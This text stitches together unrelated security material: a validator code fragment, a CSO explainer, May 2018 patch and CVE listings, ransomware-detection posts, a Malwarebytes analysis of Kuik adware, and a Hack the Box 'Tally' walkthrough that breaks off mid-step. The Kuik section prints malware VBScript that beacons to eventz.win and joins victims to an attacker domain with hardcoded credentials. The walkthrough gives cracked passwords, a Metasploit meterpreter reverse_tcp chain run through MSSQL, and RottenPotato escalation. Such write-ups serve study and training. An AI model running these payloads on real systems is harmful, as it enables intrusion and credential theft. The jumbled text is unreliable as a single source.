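    return EXPECTED_SHAPE.fullmatch(value) is not None


def layered_verdict(value: str, ai_score: float, threshold: float = 0.8) -> str:
    """Guideline 7: the AI score (a constructed number in [0, 1]) is one layer
    on top of the positive-security check, never the sole decision.
    Returns 'allow', 'block:shape' or 'block:model'."""
    if not positive_model_accepts(value):
        return "block:shape"
    if negative_model_flags(value) or ai_score >= threshold:
        return "block:model"
    return "allow"


def compare(samples):
    """Run both models over the samples; returns
    {sample: (negative_model_flags, positive_model_accepts)}."""
    return {s: (negative_model_flags(s), positive_model_accepts(s)) for s in samples}


# Constructed samples: a benign value, the traversal token in the one look the
# negative model knows, and two same-essence, different-look variants of it.
SAMPLES = [
    "alice_01",    # benign, expected shape
    "../etc",      # the look the negative model was written for
    "..%2Fetc",    # same essence, URL-encoded slash: negative model misses it
    "..\\etc",     # same essence, backslash: negative model misses it
]

if __name__ == "__main__":
    for sample, (flagged, accepted) in compare(SAMPLES).items():
        print(f"{sample!r:12} negative flags={flagged!s:5} positive accepts={accepted}")
```

The positive validator rejects all three traversal variants for the same reason (wrong shape), so an attacker gains nothing from re-spelling the token; the negative detector catches only the spelling it was written for. In `layered_verdict`, the shape check runs first so the score never becomes the only thing standing between the input and the application.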

What is a Chief Security Officer (CSO)? Understanding this critical role

A CSO is a departmental leader responsible for information security, corporate security or both. That's the simplest answer to the question "What is a CSO?", and one that our founding editor Derek Slater offered up to readers way back in 2005 — heck, if there's one website you ought to be able to trust to tell you what a CSO is, it's CSOonline. But of course, no one-sentence answer can encapsulate the complexity of a job like this, and not everyone with the CSO title has the same set of responsibilities.

The title Chief Security Officer (CSO) was first used principally inside the information technology function to designate the person responsible for IT security. At many companies, the term CSO is still used in this way. Chief Information Security Officer (CISO) is perhaps a more accurate description of this position, and today the CISO title is becoming more prevalent for leaders with an exclusive information security focus.


Microsoft Patch Tuesday – May 2018

Today, Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 67 new vulnerabilities, with 21 of them rated critical, 42 of them rated important, and four rated as low severity. These vulnerabilities impact Outlook, Office, Exchange, Edge, Internet Explorer and more.

In addition to the 67 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180008, which addresses the vulnerability CVE-2018-4944 described in the Adobe security bulletin APSB18-16.

Critical Vulnerabilities

This month, Microsoft is addressing 21 vulnerabilities that are rated as critical. Talos believes one of these is notable and requires prompt attention.

CVE-2018-8174 - Windows VBScript Engine Remote Code Execution Vulnerability.
A remote code execution vulnerability exists in the VBScript scripting engine (vbscript.dll) of Windows. This vulnerability allows an attacker to include malicious VBScript within a website or embedded within an Office file, which when executed allows an attacker to execute arbitrary code in the context of the current user. Threat actors are currently exploiting this vulnerability.

Other vulnerabilities rated as critical are listed below:

CVE-2018-0959 - Hyper-V Remote Code Execution Vulnerability
CVE-2018-0961 - Hyper-V vSMB Remote Code Execution Vulnerability
CVE-2018-8115 - Windows Host Compute Service Shim Remote Code Execution Vulnerability
CVE-2018-8178 - Microsoft Browser Memory Corruption Vulnerability
CVE-2018-0946 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0951 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0953 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0954 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0955 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8114 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8122 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8137 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0945 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-1022 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8139 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8128 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8133 - Chakra Scripting Engine Memory Corruption Vulnerability
CVE-2018-0943 - Chakra Scripting Engine Memory Corruption Vulnerability
CVE-2018-8130 - Chakra Scripting Engine Memory Corruption Vulnerability
CVE-2018-8177 - Chakra Scripting Engine Memory Corruption Vulnerability

Important Vulnerabilities

This month, Microsoft is addressing 42 vulnerabilities that are rated important.

CVE-2018-8120 - Win32k Elevation of Privilege Vulnerability
CVE-2018-8123 - Microsoft Edge Memory Corruption Vulnerability
CVE-2018-8124 - Win32k Elevation of Privilege Vulnerability
CVE-2018-8147 - Microsoft Excel Remote Code Execution Vulnerability
CVE-2018-8148 - Microsoft Excel Remote Code Execution Vulnerability
CVE-2018-8157 - Microsoft Office Remote Code Execution Vulnerability
CVE-2018-8158 - Microsoft Office Remote Code Execution Vulnerability
CVE-2018-8161 - Microsoft Office Remote Code Execution Vulnerability
CVE-2018-8162 - Microsoft Excel Remote Code Execution Vulnerability
CVE-2018-8164 - Win32k Elevation of Privilege Vulnerability
CVE-2018-8165 - DirectX Graphics Kernel Elevation of Privilege Vulnerability
CVE-2018-8166 - Win32k Elevation of Privilege Vulnerability
CVE-2018-8167 - Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2018-8179 - Microsoft Edge Memory Corruption Vulnerability
CVE-2018-0765 - .NET and .NET Core Denial of Service Vulnerability
CVE-2018-0824 - Microsoft COM for Windows Remote Code Execution Vulnerability
CVE-2018-0854 - Windows Security Feature Bypass Vulnerability
CVE-2018-0958 - Windows Security Feature Bypass Vulnerability
CVE-2018-1021 - Microsoft Edge Information Disclosure Vulnerability
CVE-2018-1025 - Microsoft Browser Information Disclosure Vulnerability
CVE-2018-1039 - .NET Framework Device Guard Security Feature Bypass Vulnerability
CVE-2018-8112 - Microsoft Edge Security Feature Bypass Vulnerability
CVE-2018-8119 - Azure IoT SDK Spoofing Vulnerability
CVE-2018-8126 - Internet Explorer Security Feature Bypass Vulnerability
CVE-2018-8127 - Windows Kernel Information Disclosure Vulnerability
CVE-2018-8129 - Windows Security Feature Bypass Vulnerability
CVE-2018-8132 - Windows Security Feature Bypass Vulnerability
CVE-2018-8134 - Windows Elevation of Privilege Vulnerability
CVE-2018-8141 - Windows Kernel Information Disclosure Vulnerability
CVE-2018-8145 - Chakra Scripting Engine Memory Corruption Vulnerability
CVE-2018-8149 - Microsoft SharePoint Elevation of Privilege Vulnerability
CVE-2018-8150 - Microsoft Outlook Security Feature Bypass Vulnerability
CVE-2018-8151 - Microsoft Exchange Memory Corruption Vulnerability
CVE-2018-8152 - Microsoft Exchange Server Elevation of Privilege Vulnerability
CVE-2018-8155 - Microsoft SharePoint Elevation of Privilege Vulnerability
CVE-2018-8156 - Microsoft SharePoint Elevation of Privilege Vulnerability
CVE-2018-8159 - Microsoft Exchange Elevation of Privilege Vulnerability
CVE-2018-8160 - Microsoft Outlook Information Disclosure Vulnerability
CVE-2018-8163 - Microsoft Excel Information Disclosure Vulnerability
CVE-2018-8170 - Windows Image Elevation of Privilege Vulnerability
CVE-2018-8173 - Microsoft InfoPath Remote Code Execution Vulnerability
CVE-2018-8897 - Windows Kernel Elevation of Privilege Vulnerability


In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:
 46538 - 46539,
 46544 - 46549,
 46552 - 46565,
 46594 - 46597,
 46601 - 46604

Cisco FXOS and NX-OS System Software Authentication, Authorization, and Accounting Denial of Service Vulnerability

A vulnerability in the authentication, authorization, and accounting (AAA) implementation of Cisco Firepower Extensible Operating System (FXOS) and NX-OS System Software could allow an unauthenticated, remote attacker to cause an affected device to reload.

The vulnerability occurs because AAA processes prevent the NX-OS System Manager from receiving keepalive messages when an affected device receives a high rate of login attempts, such as in a brute-force login attack. System memory can run low on the FXOS devices under the same conditions, which could cause the AAA process to unexpectedly restart or cause the device to reload.

An attacker could exploit this vulnerability by performing a brute-force login attack against a device that is configured with AAA security services. A successful exploit could allow the attacker to cause the affected device to reload.

Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.

Note: Previous versions of this advisory recommended upgrading the Cisco NX-OS Software Release and configuring the login block-for CLI command to prevent this vulnerability. Cisco has since become aware that the login block-for CLI command may not function as desired in all cases. This does not apply to Cisco FXOS. Please refer to the Details section for additional information.

This advisory is available at the following link:
Security Impact Rating: High
CVE: CVE-2017-3883

Microsoft Releases May 2018 Security Updates

Original release date: May 08, 2018

Microsoft has released updates to address vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review Microsoft's May 2018 Security Update Summary and Deployment Information and apply the necessary updates.


CVE-2018-6511 (puppet)

A cross-site scripting vulnerability in Puppet Enterprise Console of Puppet Enterprise allows a user to inject scripts into the Puppet Enterprise Console when using the Puppet Enterprise Console. Affected releases are Puppet Puppet Enterprise: 2017.3.x versions prior to 2017.3.6.

CVE-2018-6510 (puppet)

A cross-site scripting vulnerability in Puppet Enterprise Console of Puppet Enterprise allows a user to inject scripts into the Puppet Enterprise Console when using the Orchestrator. Affected releases are Puppet Puppet Enterprise: 2017.3.x versions prior to 2017.3.6.

CVE-2017-2611 (jenkins)

Jenkins before versions 2.44, 2.32.2 is vulnerable to an insufficient permission check for periodic processes (SECURITY-389). The URLs /workspaceCleanup and /fingerprintCleanup did not perform permission checks, allowing users with read access to Jenkins to trigger these background processes (that are otherwise performed daily), possibly causing additional load on Jenkins master and agents.

Big Brother vs. Little Brother: Mapping Where Our Personal Information Goes

More and more, the news is filled with stories about how personal information is being used to benefit others. From revelations after Mark Zuckerberg’s pseudo mea culpa in front of Congress last month, to stories about fake news, identity theft, and how data mining is being used by political campaigns to understand the demographics and psychographics of potential voters, these Little Brothers are collecting massive amounts of personal data – all with our tacit consent.

St. Kitts and Nevis Pass the Data Protection Bill 2018

On May 4, 2018, St. Kitts and Nevis’ legislators passed the Data Protection Bill 2018 (the “Bill”). The Bill was passed to promote the protection of personal data processed by public and private bodies.

Attorney General the Honourable Vincent Byron explained that the Bill is largely derived from the Organization of Eastern Caribbean States model and “seeks to ensure that personal information in the custody or control of an organization, whether it be a public group like the government, or private organization, shall not be disclosed, processed or used other than the purpose for which it was collected, except with the consent of the individual or where exemptions are clearly defined.”


Massive localstorage[.]tk Drupal Infection

After a series of critical Drupal vulnerabilities disclosed this spring, it’s not surprising to see a surge of massive Drupal infections like this one:

Massive #Drupal infection that redirects to "Tech Support" scam via "js.localstorage[.]tk" https://t.co/30ZeLIyfza pic.twitter.com/ZCPMepM74k

— Denis (@unmaskparasites) April 24, 2018

… with over a thousand compromised sites that redirect visitors to “Tech support” scam pages.

Malicious Injections

The infected pages contain the following JavaScript code, which is injected into various .tpl.php, .html.twig and .js files.


Hackers Found Using A New Way to Bypass Microsoft Office 365 Safe Links

Security researchers revealed a way around that some hacking groups have been found using in the wild to bypass a security feature of Microsoft Office 365, which is originally designed to protect users from malware and phishing attacks. Dubbed Safe Links, the feature has been included in Office 365 software as part of Microsoft's Advanced Threat Protection (ATP) solution that works by replacing

CVE-2017-2592 (oslo.middleware, ubuntu_linux)

python-oslo-middleware before versions 3.8.1, 3.19.1, 3.23.1 is vulnerable to an information disclosure. Software using the CatchError class could include sensitive values in a traceback's error message. System users could exploit this flaw to obtain sensitive information from OpenStack component error logs (for example, keystone tokens).

CVE-2017-2594 (hawtio)

hawtio before versions 2.0-beta-1, 2.0-beta-2, 2.0-m1, 2.0-m2, 2.0-m3, and 1.5 is vulnerable to a path traversal that leads to a NullPointerException with a full stacktrace. An attacker could use this flaw to gather undisclosed information from within hawtio's root.

Securing the modern workplace with Microsoft 365 threat protection – part 3

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Detecting ransomware in the modern workplace

Over the last two weeks, we have shared with you the roots of Microsoft 365 threat protection and how Microsoft 365 threat protection helps protect the modern workplace from ransomware. This week, we discuss how Microsoft 365 threat protection helps detect ransomware in the modern workplace. Detection is critical for any best-in-class security solution, especially when the person does not use Microsoft Edge with the benefits of its web protection. In our web-based scenario, the user can access the website through another browser, download the “software update” and infect their machine with ransomware. Microsoft 365 offers detection capabilities across all threat vectors, and figure 1 summarizes the services which help to detect threats.

Ransomware Detection with Microsoft 365:

  • Windows Defender Advanced Threat Protection
  • Azure Advanced Threat Protection
  • Microsoft Cloud App Security
  • Azure Security Center
  • Office 365 Advanced Threat Protection
  • Office 365 Threat Intelligence

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace

For example, with ransomware downloads from the web, Windows Defender ATP’s (WDATP) next-gen antivirus protection does an initial analysis of the file and sends all suspicious files to a detonation chamber. The file verdict is quickly determined. If a malicious verdict is returned, WDATP immediately begins blocking the threat. Today’s most sophisticated ransomware is designed to spread laterally across networks, increasing its potential impact. Fortunately, WDATP enables security operations specialists to isolate machines from the network, stopping threats from spreading. Also, WDATP provides granular visibility into the device ecosystem so that a compromised device can be easily identified. Built-in threat intelligence is leveraged to help detect the latest threats and provide real-time threat monitoring. As we alluded to, signal sharing via the Intelligent Security Graph is a powerful differentiator of Microsoft 365, enabling threat detection across any threat vector. Once WDATP determines the downloaded files are malicious, it shares this signal with the Intelligent Security Graph, enabling our other platforms to become aware of the threat.

The seamless integration, for example, allows admins to pivot directly from the device analysis in WDATP to user profiles in Azure ATP without losing context allowing a detailed investigation of the incident as shown in Figure 2 below.

Figure 2. Signal sharing and event timeline shared between WDATP and Azure ATP

Often, ransomware uses a brute force password method to move laterally through a network which our Azure ATP service is specifically designed to detect. A brute force password attack may attempt multiple logins until a correct password is used to enter an account. This anomalous behavior would be detected by Azure ATP and with signals shared from WDATP, the anomaly would be quickly assigned to the ransomware and blocked from being downloaded onto any part of the network (device, user, etc). Azure ATP enables security operations analysts to investigate the type of intrusions and methods used by attackers to gain privileged access to user identities and provides a clear attack and event timeline. While Azure ATP detects anomalies at the network level, Microsoft Cloud App Security can detect abnormal file and user behavior within native Microsoft cloud apps such as Office 365, as well as third-party cloud applications. To detect ransomware attacks, Microsoft Cloud App Security identifies behavioral patterns that reflect ransomware activity; for example, a high rate of file uploads or file deletion activities, coupled with threat intelligence capabilities, such as the detection of known ransomware extensions. Microsoft Cloud App Security will alert on these abnormalities using anomaly detection policies that provide out-of-the-box user and entity behavioral analytics (UEBA) and machine learning (ML) capabilities, as well as fully customizable activity policies, enabling SecOps to detect these anomalies instantly. Learn more about how Microsoft Cloud App Security and Azure ATP work in tandem to help detect an actual ransomware attack.
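The two behavioral signals named above for Cloud App Security, a burst of file upload or deletion activity by one user and the appearance of a known ransomware extension, are simple enough to show as detection logic. The following is an added example (not Microsoft’s code) that runs a sliding-window count per user over constructed audit log lines; the log format, the extension list, the window and the threshold are all constructed placeholders, not the product’s own values.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Placeholder list of extensions treated as ransomware indicators (constructed).
KNOWN_RANSOM_EXT = {".locked", ".crypt"}
BURST_THRESHOLD = 5              # delete/upload events per user per window
WINDOW = timedelta(minutes=2)    # sliding window length

# Constructed audit log, one event per line:
# "<ISO timestamp> <user> <action> <path>"  (renames use "old->new")
SAMPLE_LOG = """\
2018-05-08T09:00:01 alice FileModified /docs/q1.xlsx
2018-05-08T09:00:05 alice FileUploaded /docs/q2.xlsx
2018-05-08T09:01:00 bob FileDeleted /share/a.docx
2018-05-08T09:01:02 bob FileDeleted /share/b.docx
2018-05-08T09:01:03 bob FileDeleted /share/c.docx
2018-05-08T09:01:04 bob FileDeleted /share/d.docx
2018-05-08T09:01:05 bob FileUploaded /share/d.docx.locked
2018-05-08T09:01:06 bob FileDeleted /share/e.docx
2018-05-08T09:30:00 carol FileRenamed /share/notes.txt->/share/notes.txt.crypt
"""


def parse_line(line: str):
    """Split one constructed log line into (timestamp, user, action, path)."""
    ts, user, action, path = line.split(" ", 3)
    return datetime.fromisoformat(ts), user, action, path


def detect(log_text: str):
    """Return a list of (timestamp, user, reason) alerts for the two signals:
    a known ransomware extension on a written/renamed target, and a burst of
    delete/upload events by one user inside the sliding window."""
    alerts = []
    recent = defaultdict(deque)   # user -> timestamps of recent delete/upload events
    burst_alerted = set()         # alert once per user per burst, not per event
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, action, path = parse_line(line)

        # Signal 1: known ransomware extension on the target of the write/rename.
        target = path.split("->")[-1]
        if any(target.lower().endswith(ext) for ext in KNOWN_RANSOM_EXT):
            alerts.append((ts, user, f"known ransomware extension on {target}"))

        # Signal 2: burst of delete/upload events within the sliding window.
        if action in ("FileDeleted", "FileUploaded"):
            q = recent[user]
            q.append(ts)
            while q and ts - q[0] > WINDOW:   # drop events older than the window
                q.popleft()
            if len(q) >= BURST_THRESHOLD and user not in burst_alerted:
                burst_alerted.add(user)
                alerts.append((ts, user, f"{len(q)} delete/upload events within {WINDOW}"))
    return alerts


if __name__ == "__main__":
    for ts, user, reason in detect(SAMPLE_LOG):
        print(f"{ts.isoformat()} {user}: {reason}")
```

On the constructed log, alice’s ordinary edits produce nothing, bob trips both signals (the `.locked` upload and a five-event burst within two minutes), and carol’s single rename is caught by the extension check alone. The two signals are kept independent on purpose: a burst without a known extension still alerts, which is what makes the rate-based rule useful against ransomware whose extension is not yet on any list.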

Azure Security Center is also connected with WDATP and provides infrastructure-level alerts, and even provides an investigation path so admins can fully view the threat propagation details. The service includes threat intelligence which maps the threat source and provides the potential objectives of the threat campaign. What happens if an attacker senses that the web-based attack vector is being blocked and pivots to sending the ransomware via email as an attachment download? Microsoft 365 integration is again crucial, as WDATP also shares the signal with Office 365, and once our ransomware is identified by WDATP, Office 365 will begin blocking the threat too. With Office 365 ATP’s real-time reporting and Office 365 Threat Intelligence, admins gain full visibility into all users who receive ransomware via email. Both Office 365 ATP and Office 365 Threat Intelligence also track threats found in SharePoint Online, OneDrive for Business, and Teams, so detection extends to the entire Office 365 suite. With Microsoft 365 threat protection, threats can be easily detected no matter how an attack is launched. Figure 3 shows the new Microsoft 365 Security and Compliance Center, which is the hub from where admins can access the information from the different services.

Figure 3. Microsoft 365 Security and Compliance center which connects the Azure, Office 365, and Windows workloads

Next week we conclude our Microsoft 365 threat protection blog series by covering the remediation and education capabilities offered by Microsoft 365 threat protection. We will demonstrate how Microsoft 365 threat protection workloads can help quickly remediate a ransomware attack and also help educate end users on how to behave and react when under attack.


Kuik: a simple yet annoying piece of adware

Some pieces of malware can be so simple—and yet such a pain to get rid of—especially when they start interfering with your system’s configuration. This much is true for the Kuik adware program, which surprised us all by forcing affected machines to join a domain controller.

The perpetrators are using this unusual technique to push Google Chrome extensions and coin miner applications to their victims. In this blog, we’ll provide technical analysis of this adware and custom removal instructions.

Technical description

Stage 1 – .NET installer


The first stage is written in .NET with an icon imitating the Adobe Flash Player. This is typical of bundlers that promise to update software components but also add their own code to the original installer.

After opening it with a .NET decompiler (e.g. dnSpy), we found that the project’s original name was WWVaper.

It has three resources inside:

  • a certificate (svr.crt)
  • a legitimate Flash (decoy)
  • a next stage component (upp.exe)

The certificate:


Details of the certificate:

The certificate points to a DNS name of yahoo.com. However, the certification path is invalid:

The .NET installer is responsible for installing the malicious certificate and other components. First, it enumerates the network interfaces and adds collected IPs to the list:

Then, it adds a new IP as a DNS ( to the collected interfaces. It also installs its own certificate (svr.crt):

Stage 2 – upp.exe

This application is an installer bundle that is not obfuscated. Inside, we found a cabinet file:

It contains other modules to be dropped:

The application “install.exe” is deployed with the “setup.bat” as a parameter.

Stage 3 – unpacked components from the cabinet

The application install.exe is basic. Its only role is to run the next process in elevated mode. Below, you can see its main function:

The script setup.bat deploys another component named SqadU9FBEV.bat:

It delays execution by pinging Then, it runs the second encoded script, giving it a campaign ID as a parameter:

The next element deployed is an encoded VBS script:

After decoding it (with this decoder), we saw this script in the clear: NYkjVVXepl.vbs. We also saw that it fingerprints the system and beacons to a server:

' Fingerprint: read the OS caption (e.g. "Microsoft Windows 10 Pro") via WMI
Set SystemSet = GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem")
for each System in SystemSet
  winVer = System.Caption
Next

' Beacon: reports an event name, the machine UUID, the OS version, the last error and
' the campaign/channel IDs to the tracking server (excerpt; only the request setup is shown)
Function trackEvent(eventName, extraData)
  Set tracking = CreateObject("MSXML2.XMLHTTP")
  tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False
End Function

The interesting fragment is about adding the infected computer to a domain:

' Flags for Win32_ComputerSystem.JoinDomainOrWorkgroup (the documented NETSETUP_* values;
' their definitions were not part of the excerpt)
Const JOIN_DOMAIN = 1
Const ACCT_CREATE = 2
Const DOMAIN_JOIN_IF_JOINED = 32
Const JOIN_UNSECURE = 64

SET objNetwork = CREATEOBJECT("WScript.Network")
strComputer = objNetwork.ComputerName
SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'")
' Joins the machine to the attacker's domain with hardcoded credentials, creating the
' computer account in an OU named after the campaign ID passed as the first argument
ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)
If (ReturnValue <> 0) Or (err.number <> 0) Then
  trackEvent "join-domain-failed", ReturnValue
  WScript.Quit 1
Else
  trackEvent "join-domain-success", Null
  WScript.Quit 0
End If


There is a range of payloads being used by this program, but bogus Chrome extensions seem to be a particular favorite. In addition, some coin miners are being served:

Malwarebytes users (version 3.x) can remove this threat from their system by running a full scan. The removal includes unjoining the malicious domain controller to restore your machine to its original state.
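As an added defensive check (example code, not Malwarebytes' own), the PowerShell script below looks on a Windows machine for the artefacts described above: membership of the kuikdelivery.com domain, DNS servers outside an allow-list, a certificate naming yahoo.com that is self-signed or fails chain validation, the dropped file names, and cached lookups of the beacon host. The expected domain, the resolver allow-list and the search paths are assumptions to adjust for your environment.

```powershell
# Kuik indicator check (added example; not Malwarebytes' code). Reads only local state and
# prints findings. Assumptions: -ExpectedDomain and $allowedDns are placeholders you replace
# with your real AD domain and resolver addresses; run from an elevated PowerShell 5.1 session.
param(
    [string]$ExpectedDomain = 'WORKGROUP'
)

$findings = New-Object System.Collections.Generic.List[string]

# 1. Domain membership. The decoded VBS joins the victim to kuikdelivery.com with the
#    campaign ID as the OU name, so any unexpected domain is the strongest signal.
$cs = Get-CimInstance -ClassName Win32_ComputerSystem
if ($cs.Domain -match 'kuikdelivery\.com$') {
    $findings.Add("Joined to the known Kuik domain '$($cs.Domain)'")
} elseif ($cs.PartOfDomain -and $cs.Domain -ne $ExpectedDomain) {
    $findings.Add("Joined to unexpected domain '$($cs.Domain)' (expected '$ExpectedDomain')")
}

# 2. DNS servers. Stage 1 enumerates the interfaces and adds its own IP as a DNS server on
#    each of them; report every configured server that is not on the allow-list.
$allowedDns = @('192.0.2.53')   # constructed placeholder (TEST-NET address); use your resolvers
foreach ($iface in Get-DnsClientServerAddress -AddressFamily IPv4) {
    foreach ($srv in $iface.ServerAddresses) {
        if ($allowedDns -notcontains $srv) {
            $findings.Add("Interface '$($iface.InterfaceAlias)' uses unexpected DNS server $srv")
        }
    }
}

# 3. Certificates. svr.crt names yahoo.com but has an invalid certification path; a cert for
#    a public site that is self-signed or fails chain validation in a machine store is suspect.
$stores = 'Cert:\LocalMachine\Root', 'Cert:\LocalMachine\My', 'Cert:\LocalMachine\CA', 'Cert:\CurrentUser\Root'
foreach ($store in $stores) {
    foreach ($cert in Get-ChildItem -Path $store -ErrorAction SilentlyContinue) {
        # Subject Alternative Name extension (OID 2.5.29.17) rendered as text
        $san = ($cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.17' } |
                ForEach-Object { $_.Format($false) }) -join ';'
        $namesYahoo = ($cert.Subject -match 'yahoo\.com') -or ($san -match 'yahoo\.com')
        $untrusted  = ($cert.Subject -eq $cert.Issuer) -or (-not $cert.Verify())
        if ($namesYahoo -and $untrusted) {
            $findings.Add("Suspect certificate for yahoo.com in $store, thumbprint $($cert.Thumbprint)")
        }
    }
}

# 4. Dropped files named in the analysis (stage 2 cabinet contents and the decoded scripts).
$dropped = 'upp.exe', 'install.exe', 'setup.bat', 'SqadU9FBEV.bat', 'NYkjVVXepl.vbs', 'svr.crt'
$roots = $env:TEMP, $env:ProgramData, $env:LOCALAPPDATA, "$env:SystemRoot\Temp"   # assumed drop locations
Get-ChildItem -Path $roots -Recurse -Depth 3 -File -ErrorAction SilentlyContinue |
    Where-Object { $dropped -contains $_.Name } |
    ForEach-Object { $findings.Add("Dropped file present: $($_.FullName)") }

# 5. Recent resolution of the beacon or domain-controller hosts in the local DNS cache.
Get-DnsClientCache -ErrorAction SilentlyContinue |
    Where-Object { $_.Entry -match 'kuikdelivery\.com$|eventz\.win$' } |
    ForEach-Object { $findings.Add("DNS cache entry for $($_.Entry) -> $($_.Data)") }

if ($findings.Count -eq 0) {
    Write-Output 'No Kuik indicators found.'
} else {
    $findings | ForEach-Object { Write-Warning $_ }
    exit 1
}
```

A non-zero exit code makes the script usable from a scheduled task or endpoint-management job that alerts on findings.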

Indicators of compromise



Chrome extensions




The post Kuik: a simple yet annoying piece of adware appeared first on Malwarebytes Labs.

Hack the Box Challenge: Tally Walkthrough

Hello Friends!! Today we are going to solve the CTF challenge “Tally”. It is a lab developed by Hack the Box, which has an amazing collection of online labs on which you can practice your penetration testing skills. Their labs are designed for everyone from beginners to expert penetration testers. Tally is a retired lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Tally Lab has IP:

Now, as always let’s begin our hacking with the port enumeration.

nmap -p- -A

When you explore the target IP through the browser, it redirects to a SharePoint page, as shown below and as nmap also reported in the image above.

We then used several directory brute-forcing tools to enumerate useful web directories but failed to retrieve anything. So I searched for web directories manually with the help of Google and gradually reached /sitepages/FinanceTeam.aspx, where I found the FTP username, as shown in the image below.

Moreover, I found a link describing SharePoint directory brute-force attacks that helped me with the next step.

From the link above we found the URL documents/forms/allitems.aspx; when you open that path in your browser, as shown below, you will see a file named “ftp-details”. Download this doc file and open it.

You will get a password from inside the ftp-details doc file.

Now log in to FTP using the following credentials and download tim.kdbx to your local machine.

Username: ftp_user
Password: UTDRSCH53c"$6hys

Since the file has a .kdbx extension and I didn’t know much about it, I turned to Google and found a link to download a Python script that extracts a HashCat/John-crackable hash from KeePass 1.x/2.x databases.

python keepass2john.py tim.kdbx > tim

Next, we used John the Ripper to crack the hash in “tim” with the following command.

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim

Once you obtain the password, you need “keepass2”, the application used for storing your system’s passwords; install it with the following command:

apt-get install keepass2 -y

After installing, run the command below and enter “simplementeyo” in the master key field.

keepass2 tim.kdbx

Then you can find a username and password inside /Work/Windows/Shares for SMB login, since ports 135-445 are open on the target machine for file sharing.

Here the password is masked with * characters; copy and paste it into a text file and you will get the password in plain text, i.e. Acc0unting.

Now that you have the SMB login credentials “Finance: Acc0unting”, execute the following command to connect to the target; it will show “ACCT” as the share name.

smbclient -L -U Finance

Then type the commands below and, when you find conn-info.txt, download it.

smbclient // -U Finance
cd zz_Archived
cd SQL
get conn-info.txt

Once you download conn-info.txt and open it, it gives you the MSSQL database login credentials.

db: sa
pass: YE%TJC%&HYbe5Nw

From the image below you can observe that these are old server details, so the password for sa may have been changed since.

Log in to SMB again and look for the next hint by moving into /zz_Migration; to do so, execute the commands below:

smbclient // -U Finance
cd zz_Migration
cd Binaries
cd "New folder"

Here you will find tester.exe; download it.

get tester.exe

You will get tester.exe inside your /root directory. Since the file is too large to read through for useful information, use the strings command together with grep.

strings tester.exe | grep DATABASE

You will get a new password for user sa, as shown in the image below.

For the next step I took help from our previous article on MSSQL penetration testing. Open a new terminal, load the Metasploit framework and execute the commands below.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > set srvhost
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for the .dll and paste it as the CMD command, as shown in the next image.

Now open a new terminal, load another Metasploit console and execute the commands below.

use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit

You will get a meterpreter session on the victim’s machine in your first Metasploit console; then finish the task by grabbing the user.txt and root.txt files. Next, type the following:

So currently we don’t have NT AUTHORITY\SYSTEM permissions.

But we have successfully grabbed user.txt file from inside /Sarah/Desktop.

cd Sarah/Desktop
cat user.txt

In this way we have completed our first task. Now let’s find root.txt!!

load incognito

The incognito option in a meterpreter session was originally a stand-alone application that lets you impersonate user tokens after successfully compromising a system. The first thing we need to do is identify whether there are any valid tokens on this system:

list_token -u

As for impersonation tokens, you can see that currently there is no token available.

Then I took help from Google for this scenario and found a link to download RottenPotato from GitHub for privilege escalation.

git clone https://github.com/foxglovesec/RottenPotato.git

After downloading, you will have the rottenpotato.exe file.

Upload the exe file to the victim’s machine.

upload /root/Desktop/RottenPotato/rottenpotato.exe .

